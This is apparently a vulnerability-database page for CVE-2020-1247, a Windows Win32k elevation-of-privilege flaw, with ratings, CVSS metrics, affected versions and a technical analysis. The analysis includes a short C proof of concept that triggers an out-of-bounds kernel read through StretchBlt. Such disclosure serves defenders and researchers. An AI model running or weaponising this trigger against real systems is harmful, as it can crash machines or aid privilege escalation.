Attacker Value
High
(1 user assessed)
Exploitability
Very Low
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Local
1

CVE-2020-1247

Disclosure Date: June 09, 2020
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka ‘Win32k Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-1207, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310.

Add Assessment

3
Ratings
Technical Analysis

A vulnerability exists within the NtGditretchBlt system call that can be leveraged to trigger an out of bounds read access within win32kfull!vStrWrite04. The bug manifests itself when the Special Pool setting is enabled through the driver verifier utility.

An attacker would use this flaw to escalate their privileges to that of the local system through this kernel mode exploit.

Exploitation would be very difficult, a successful attack would need an information leak as well as reliable control over the win32k heap which is more difficult on Windows 10 than previous versions of Windows due to type isolation (added in RS3) and the KASLR improvements (added in the Anniversary Update). The win32k subsystem is however available as an attack surface on all versions of Windows making it a very high-value target.

#include <Windows.h>

int main()
{
    BITMAPINFO bi = {{0x28, 0x2, 0xfffffffffffffffb, 0x2, 0x4, 0x0, 0x0, 0x0, 0x0, 0x0, 0x2}};
    char out[0x1000] = {0};
    HDC r0 = CreateCompatibleDC(0x0);
    HBITMAP r1 = CreateDIBitmap(r0, 0x0, 0x6, &out, &bi, 0x0);
    SelectObject(r0, r1);
    StretchBlt(r0, 0x0, 0x0, 0x8, 0x8, r0, 0x0, 0x0, 0xffffffffffffffeb, 0x4, 0xee00e6);

    return 0;
}

Original PoC provided by Check Point Research, see: https://cpr-zero.checkpoint.com/about/

CVSS V3 Severity and Metrics
Base Score:
7.8 High
Impact Score:
5.9
Exploitability Score:
1.8
Vector:
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Local
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • microsoft

Products

  • windows 10 -,
  • windows 10 1607,
  • windows 10 1709,
  • windows 10 1803,
  • windows 10 1809,
  • windows 10 1903,
  • windows 10 1909,
  • windows 10 2004,
  • windows 7 -,
  • windows 8.1 -,
  • windows rt 8.1 -,
  • windows server 2008 -,
  • windows server 2008 r2,
  • windows server 2012 -,
  • windows server 2012 r2,
  • windows server 2016 -,
  • windows server 2016 1803,
  • windows server 2016 1903,
  • windows server 2016 1909,
  • windows server 2016 2004,
  • windows server 2019 -

Additional Info

Technical Analysis